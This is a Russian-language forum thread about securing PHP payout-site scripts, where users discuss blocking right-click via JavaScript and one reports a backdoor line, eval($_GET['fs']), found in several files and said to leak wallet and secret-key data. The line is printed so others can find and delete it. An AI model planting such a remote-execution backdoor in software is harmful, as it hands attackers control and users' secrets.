TyTuKeT
Участник
- Сообщения
- 219
- Реакции
- 37
Круто!Сделал)Только по другой стороне пошел)проще так сказать)нашел в гугле ява меню и переделал))wh1skas написал(а):К сожалению, у этого скрипта есть изъян, который позволяет отключить в браузере JS и обойти эту уловку с запретом на использование ПКМ.
Есть несколько способов решения этой проблемы, сразу перейду к ним, только в совокупности это спасет Вас, а точнее Ваших пользователей от подмены кошелька мошенником:
1. Необходимо обрамить код заказа выплаты в javascript, а именно только таблицу с формой (<form> имеется ввиду).
2. Выводить в тегах <noscript> на сайте, что сайт не будет работать с отключенными JavaScript.
Соответственно, что мы имеем:
Посмотреть вложение 1085
Согласну анимашке, пользователь будет жмякать на кнопочки оформления заявки, заказывать выплату. Предположим, что кошелек привязан. Хацкер захочет сменить кошелек, посредством подмены через код страницы (элемента). ДжаваСкрипт запрещает использовать ПКМ. Хацкер отключает JS в браузере и пытается обойти запрет но:
1. Теперь он может юзать пкм на странице.
2. Кнопка оформления не сработает.
Ура? - УРА!
TyTuKeT
Участник
- Сообщения
- 219
- Реакции
- 37
Algolem
Участник
- Сообщения
- 25
- Реакции
- 0
Люди добрые,перечитал всю инфу,в этом топике,вижу что очень полезных материалов тут полно,но прошу Вас,если возможно обьясните подробней как закрыть все дыры на сайте.
В ПХП не очень разбираюсь,но операторские навыки "copy-paste" имеются Кому не трудно поэтапно и по пунктам,и если можно без сленгов,буду очень благодарен.
В ПХП не очень разбираюсь,но операторские навыки "copy-paste" имеются Кому не трудно поэтапно и по пунктам,и если можно без сленгов,буду очень благодарен.
Посмотри тут, есть что почитать:Algolem написал(а):Люди добрые,перечитал всю инфу,в этом топике,вижу что очень полезных материалов тут полно,но прошу Вас,если возможно обьясните подробней как закрыть все дыры на сайте.
В ПХП не очень разбираюсь,но операторские навыки "copy-paste" имеются Кому не трудно поэтапно и по пунктам,и если можно без сленгов,буду очень благодарен.
https://servahoc.ru/threads/filtracija-i-proverka-dannyx-php-chastye-oshibki.997/
lucky
Участник
- Сообщения
- 3
- Реакции
- 0
lucky
Участник
- Сообщения
- 3
- Реакции
- 0
та мне в качестве наглядного пособияwh1skas написал(а):такого тут никто не будет делать. Здесь не взломщики.
lucky
Участник
- Сообщения
- 3
- Реакции
- 0
буду предупрежден и не получится случайно каким-то образом совершить взломwh1skas написал(а):да хоть какого... что ебе это даст?
что то мне подсказывает что тебе это нужно именно для взлома проектов, дабы легкие деньги искушают!lucky написал(а):буду предупрежден и не получится случайно каким-то образом совершить взлом
Мне кажется, или у меня lvl-up! Начал потихоньку заниматься безопасностью и проверкой скриптов на дыры, XSS и SQL-инъекций!
Так вот, при проверке кодов страниц, обнаружился следующий код:
Советую всем удалить эту строку, несмотря на любые комментарии, которые там есть. Это все уловки. Если будет интересно, что делает этот код, пишите. Он нашелся в трех файлах.
Так вот, при проверке кодов страниц, обнаружился следующий код:
PHP:
eval($_GET['fs']);
Последнее редактирование:
ImperiaL
Участник
- Сообщения
- 42
- Реакции
- 0
wh1skas написал(а):Мне кажется, или у меня lvl-up! Начал потихоньку заниматься безопасностью и проверкой скриптов на дыры, XSS и SQL-инъекций!
Так вот, при проверке кодов страниц, обнаружился следующий код:
Советую всем удалить эту строку, несмотря на любые комментарии, которые там есть. Это все уловки. Если будет интересно, что делает этот код, пишите. Он нашелся в трех файлах.PHP:eval($_GET['fs']);
Мне очень интересно что он делает, и где его удалять?
Запрос GET в этой строке может нести и другое имя. Нужно смотреть. В одном случае не встретился такой вариант. Он отправляет на все пользователей (на email) инфу о твоем кошельке, номере магазина, секретном ключе и тд.
Ищи по всем файлам eval
Это функция php, которая запускает скрипт. В данном случае скрипт выполнял действия, которые я указал в сообщении выше. Искать нужно во всех файлах. Я увидел в файлах крон, мерчант и что-то еще, не помню
Ищи по всем файлам eval
Это функция php, которая запускает скрипт. В данном случае скрипт выполнял действия, которые я указал в сообщении выше. Искать нужно во всех файлах. Я увидел в файлах крон, мерчант и что-то еще, не помню
mobisaite
Участник
- Сообщения
- 308
- Реакции
- 63
проверила нотепадом++ по файлам в папке не нашел ничего вроде в каких файлах ты нашел данный код хотелось бы еще самой перепроверить ну и конечно же черкани что он что он делаетwh1skas написал(а):Мне кажется, или у меня lvl-up! Начал потихоньку заниматься безопасностью и проверкой скриптов на дыры, XSS и SQL-инъекций!
Так вот, при проверке кодов страниц, обнаружился следующий код:
Советую всем удалить эту строку, несмотря на любые комментарии, которые там есть. Это все уловки. Если будет интересно, что делает этот код, пишите. Он нашелся в трех файлах.PHP:eval($_GET['fs']);
mobisaite
Участник
- Сообщения
- 308
- Реакции
- 63
rezerv
Участник
- Сообщения
- 211
- Реакции
- 10
А у меня в файле cron_job.phpwh1skas написал(а):Мне кажется, или у меня lvl-up! Начал потихоньку заниматься безопасностью и проверкой скриптов на дыры, XSS и SQL-инъекций!
Так вот, при проверке кодов страниц, обнаружился следующий код:
Советую всем удалить эту строку, несмотря на любые комментарии, которые там есть. Это все уловки. Если будет интересно, что делает этот код, пишите. Он нашелся в трех файлах.PHP:eval($_GET['fs']);
PHP:
...
# Класс конфига
$config = new config;
//if(!isset($_GET["cron_key"]) OR $_GET["cron_key"] != $config->CronPass) die("Key error");
//if(!isset($_GET["type"])) die("Var type is empty");
$type = "sender";//strval($_GET["type"]);
# Функции
$func = new func;
# База данных
$db = new db($config->HostDB, $config->UserDB, $config->PassDB, $config->BaseDB);
switch($type){
case "sender": include("cron_job/_sender.php"); break; // Отправка пользователям
default: die("Type not exist"); break;
Последнее редактирование модератором: